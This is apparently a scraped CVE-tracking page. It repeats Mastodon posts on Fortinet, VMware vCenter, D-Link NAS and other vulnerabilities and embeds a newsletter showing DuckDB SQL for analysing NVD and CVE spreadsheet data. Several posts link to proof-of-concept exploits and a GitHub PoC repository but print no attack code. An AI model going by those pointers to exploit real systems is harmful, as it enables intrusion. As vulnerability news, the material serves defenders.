The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
CREATE TABLE yesterday AS (WITH __req AS ( SELECT http_get( 'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000' ) AS res ), __res AS ( SELECT UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') ) AS cves FROM __req ) FROM __res);
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nexted JSON records:
FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│ cves ││ json │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │└──────────────────────────────────────────────────────────────────────────────┘
But DuckDB let’s us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all its worth:
FROM yesterdaySELECT cves->>'cve'->>'vulnStatus' AS vulnStatus, COUNT() AS ct, ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│ vulnStatus │ ct │ pct ││ varchar │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis │ 83 │ 65.87 ││ Received │ 34 │ 26.98 ││ Undergoing Analysis │ 9 │ 7.14 │└─────────────────────┴───────┴────────┘
You can add headers, and use getenv(var)
to fill in things like API keys.
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
updated 2024-11-08T13:55:23
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):
INSTALL gsheets FROM community;LOAD gsheets;
Basic usage patterns include:
-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)
” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
LOAD gsheets;CREATE PERSISTENT SECRET ( TYPE gsheet, PROVIDER access_token, TOKEN 'yOUrToK3nH3re');
And, now we can look at the “schema”:
$ duckdb -json -c " LOAD gsheets; FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet = 'Sheet1' ) LIMIT 1" | jq[ { "Vendor": "Sophos", "Title": "Sophos SFOS SQL Injection Vulnerability", "CVE": "CVE-2020-12271", "CVSS": 9.8, "Date of NVD publication": "4/27/20", "Date of vendor advisory": "Unknown", "Used in ransomware attacks?": "Known", "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).", "Date added to KEV Catalog": "11/3/21", "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412", "Date of Known Exploitation": "Apr-20", "Threat actor": "Unknown", "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal", "Metasploit Module": "N", "GreyNoise (#of Malicious IPs Scanning)": 0.0, "Number of vulnerable devices": "?", "Number of impacted devices": "?", "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271" }]
And, perform normal ops on it:
$ duckdb -table -c "LOAD gsheets;FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet='Sheet1')SELECT Vendor, COUNT(Vendor) AS ctGROUP BY VendorORDER BY 2 DESC"+---------------------+----+| Vendor | ct |+---------------------+----+| Cisco | 72 || D-Link | 19 || Ivanti | 18 || Citrix | 16 || Fortinet | 13 || SonicWall | 10 || Zyxel | 9 || NETGEAR | 8 || Juniper | 6 || F5 | 6 || PANW | 5 || Sophos | 5 || DrayTek | 3 || Tenda | 3 || TP-Link | 2 || MikroTik | 2 || Dasan | 2 || Check Point | 1 || D-Link and TRENDnet | 1 || Barracuda | 1 || Netis | 1 || FatPipe | 1 || Arcadyan | 1 || Sumavision | 1 |+---------------------+----+
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306
(for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432
. (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.comThe DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
INSTALL http_client FROM community;LOAD http_client;
The extension provides two main functions: http_get()
for GET requests and http_post()
for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
CREATE TABLE yesterday AS (WITH __req AS ( SELECT http_get( 'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000' ) AS res ), __res AS ( SELECT UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') ) AS cves FROM __req ) FROM __res);
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nexted JSON records:
FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│ cves ││ json │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │└──────────────────────────────────────────────────────────────────────────────┘
But DuckDB let’s us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all its worth:
FROM yesterdaySELECT cves->>'cve'->>'vulnStatus' AS vulnStatus, COUNT() AS ct, ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│ vulnStatus │ ct │ pct ││ varchar │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis │ 83 │ 65.87 ││ Received │ 34 │ 26.98 ││ Undergoing Analysis │ 9 │ 7.14 │└─────────────────────┴───────┴────────┘
You can add headers, and use getenv(var)
to fill in things like API keys.
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
updated 2024-11-07T18:31:30
1 posts
Veeam security advisory from 06 November 2024 Veeam Backup Enterprise Manager Vulnerability (CVE-2024-40715)
CVE-2024-40715 (7.7 high) Veeam Backup & Replication Enterprise Manager authentication bypass while performing a Man-in-the-Middle (MITM) attack. No mention of exploitation.
#cybersecurity #infosec #vulnerability #CVE #veeam #cve_2024_40715
##updated 2024-11-06T23:39:52
1 posts
1 repos
@valorin I found this one a pretty good summary: https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.
##updated 2024-11-06T18:31:17
1 posts
1 repos
CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure
CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...
🔗️ [Cyble] https://link.is.it/e4pce7
##updated 2024-11-06T18:31:17
1 posts
1 repos
CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure
CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...
🔗️ [Cyble] https://link.is.it/e4pce7
##updated 2024-11-06T18:31:17
1 posts
Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024
updated 2024-11-06T18:31:17
1 posts
Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024
updated 2024-11-06T18:31:11
1 posts
Cisco URWB Access Point Command Injection Vulnerability (CVE-2024-20418) https://fortiguard.fortinet.com/threat-signal-report/5574
##updated 2024-11-06T18:31:09
3 posts
HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points
https://thecyberexpress.com/hpe-security-patches-cve-2024-42509/?utm_source=flipboard&utm_medium=activitypub
Posted into Cybersecurity Today @cybersecurity-today-rhudaur
##HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points https://thecyberexpress.com/hpe-security-patches-cve-2024-42509/ #ArubaNetworkingAccessPoint #SecurityVulnerabilities #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202442509 #CVE202447460 #CyberNews #AOS10 #AOS8
##The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. https://www.securityweek.com/hpe-patches-critical-vulnerabilities-in-aruba-access-points/
##updated 2024-11-06T18:31:09
1 posts
The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. https://www.securityweek.com/hpe-patches-critical-vulnerabilities-in-aruba-access-points/
##updated 2024-11-06T15:30:46
6 posts
1 repos
Wow, this is just disgusting. I have no words for this level of malfeasance.
##🚨⚠️ Si vous possédez un NAS D-Link de la gamme ShareCenter, il est temps d'agir: ces appareils sont affectés par une vulnérabilité critique de type "Command Injection" qui permet très facilement aux malintentionnées de prendre le contrôle des dispositifs exposés sur Internet.
D-Link ne propose pas de correctif pour cette faille (modèles considérés en EOL - fin de support par la marque).
Modèles affectés :
Actions conseillés :
[Informations techniques]
⬇️
"Command Injection Vulnerability in name
parameter for D-Link NAS"
👇
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07
[Infosec news]
⬇️
"D-Link won’t fix critical flaw affecting 60,000 older NAS devices"
👇
https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-flaw-affecting-60-000-older-nas-devices/
(Selon Onyphe globalement plus de 5 214 NAS ShareCenter seraient exposés sur Internet
dont 358 appareils actuellement détectés en ligne en #France )
Wow, this is just disgusting. I have no words for this level of malfeasance.
##🚨⚠️ Si vous possédez un NAS D-Link de la gamme ShareCenter, il est temps d'agir: ces appareils sont affectés par une vulnérabilité critique de type "Command Injection" qui permet très facilement aux malintentionnées de prendre le contrôle des dispositifs exposés sur Internet.
D-Link ne propose pas de correctif pour cette faille (modèles considérés en EOL - fin de support par la marque).
Modèles affectés :
Actions conseillés :
[Informations techniques]
⬇️
"Command Injection Vulnerability in name
parameter for D-Link NAS"
👇
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07
[Infosec news]
⬇️
"D-Link won’t fix critical flaw affecting 60,000 older NAS devices"
👇
https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-flaw-affecting-60-000-older-nas-devices/
(Selon Onyphe globalement plus de 5 214 NAS ShareCenter seraient exposés sur Internet
dont 358 appareils actuellement détectés en ligne en #France )
The issue, tracked as CVE-2024-10914 (CVSS score of 9.2), impacts the account management functionality of the affected devices. https://www.securityweek.com/many-legacy-d-link-nas-devices-exposed-to-remote-attacks-via-critical-flaw/
##🚨POC - CVE-2024–10914- Command Injection Vulnerability in `name` parameter for D-Link NAS
##updated 2024-11-05T21:35:24
1 posts
Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.
Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.
Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.
Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh
) and PowerShell 🪟 (release_cleaver.ps1
). See Downloading Malcolm - Installer ISOs for instructions.
As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.
dashboard-export
to the list of Malcolm APIs (cisagov/Malcolm#401)ingest-stats
to the list of Malcolm APIs (cisagov/Malcolm#488)intel.log
to the ECS's threat fields./scripts/configure
script not prompting to regenerate the internal NetBox passwords when it should havemalcolm_appliance_packager.sh
on macOS (cisagov/Malcolm#492, thanks @robrui)#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov
##updated 2024-10-31T15:31:04
1 posts
CISA Warns of Critical Vulnerabilities in Industrial Control Systems Affecting Key Infrastructure Sectors https://thecyberexpress.com/cisa-warns-of-cve-2024-8934/ #BeckhoffAutomationVulnerability #TwinCATPackageManager #TheCyberExpressNews #OScommandinjection #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE20248934 #CyberNews #CISA
##updated 2024-10-30T18:30:48
1 posts
updated 2024-10-28T17:59:30
1 posts
1 repos
Broadcom has a new security advisory for critical vulnerability CVE-2024-38821, OPS/MVS Event Management & Automation https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25196 #cybersecurity #infosec
##updated 2024-10-26T03:47:04
1 posts
Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.
Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.
Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.
Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh
) and PowerShell 🪟 (release_cleaver.ps1
). See Downloading Malcolm - Installer ISOs for instructions.
As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.
dashboard-export
to the list of Malcolm APIs (cisagov/Malcolm#401)ingest-stats
to the list of Malcolm APIs (cisagov/Malcolm#488)intel.log
to the ECS's threat fields./scripts/configure
script not prompting to regenerate the internal NetBox passwords when it should havemalcolm_appliance_packager.sh
on macOS (cisagov/Malcolm#492, thanks @robrui)#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov
##updated 2024-10-23T15:31:52
7 posts
1 repos
What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##lol, at this point you should just throw your fortinet devices into a landfill. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ #cybersecurity #infosec #Fortinet
##watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability
watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.
#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Full Rapid7 analysis and #exploit PoC (with root shell!) for #FortiManager #CVE202447575 via @stephenfewer 🐚 Not a simple project, as it turned out :) https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis
##@wdormann I think you have that confused. CVE-2024-47575 was published on 23 October 2024: https://infosec.exchange/@screaminggoat/113358758617311503
##updated 2024-10-17T15:31:09
2 posts
Remediation for CVE-2024-20767 and CVE-2024-21216 Potential Exploitable Bugs https://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/
##Remediation for CVE-2024-20767 and CVE-2024-21216 Potential Exploitable Bugs https://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/
##updated 2024-10-11T18:32:57
1 posts
1 repos
From the OpenHPC Community project:
Please join the OpenHPC Community BoF at #SC24 in B306 12:15-1:15pm Thur. 21 Nov 2024 for latest details and if you have any questions or suggestions. Members and contributors will also discuss adding Warewulf4 support Wed. 20 Nov 2:30-3:00 PM at CIQ Booth #cve_2024_4131
Look for further information from https://bsky.app/profile/openhpc.bsky.social once they start posting!
##updated 2024-10-08T18:33:29
1 posts
Microsoft Security Response Center (MSRC) updated the CVSSv3.1 vector string for CVE-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability today:
The previous CVSSv3.1 score was presumably a 7.5 high, and now it's 7.8 base. How they decided that it was a local vector with low attack complexity and no privileges required is beyond me.
##updated 2024-10-02T15:31:39
19 posts
1 repos
VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware security advisory 11/18 update: VMSA-2024-0019
VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.
cc: @cR0w @ntkramer @dreadpir8robots @campuscodi
#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation
##VMware security advisory 11/18 update: VMSA-2024-0019
VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.
cc: @cR0w @ntkramer @dreadpir8robots @campuscodi
#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation
###CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.
- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38812
- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38813
More:
- 2024 CWE Top 25 Most Dangerous Software Weaknesses https://www.cisa.gov/news-events/alerts/2024/11/20/2024-cwe-top-25-most-dangerous-software-weaknesses
- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication https://www.cisa.gov/news-events/alerts/2024/11/20/usda-releases-success-story-detailing-implementation-phishing-resistant-multi-factor-authentication @cisacyber #cybersecurity #infosec
##CVE ID: CVE-2024-38813
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Privilege Escalation Vulnerability
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 ; https://nvd.nist.gov/vuln/detail/CVE-2024-38813
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-38813
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity
###CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.
- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38812
- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38813
More:
- 2024 CWE Top 25 Most Dangerous Software Weaknesses https://www.cisa.gov/news-events/alerts/2024/11/20/2024-cwe-top-25-most-dangerous-software-weaknesses
- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication https://www.cisa.gov/news-events/alerts/2024/11/20/usda-releases-success-story-detailing-implementation-phishing-resistant-multi-factor-authentication @cisacyber #cybersecurity #infosec
##CVE ID: CVE-2024-38813
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Privilege Escalation Vulnerability
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 ; https://nvd.nist.gov/vuln/detail/CVE-2024-38813
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-38813
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity
##And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
##Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
VMSA-2024-0019: Questions & Answers https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md @vmwaresrc
More: Critical RCE bug in VMware vCenter Server now exploited in attacks https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/ @BleepingComputer @serghei #cybersecurity #infosec
##@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
THE HITS JUST KEEP COMING
##updated 2024-10-02T14:16:47.610000
19 posts
1 repos
https://github.com/groshi/CVE-2024-38812-POC-5-Hands-Private
VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
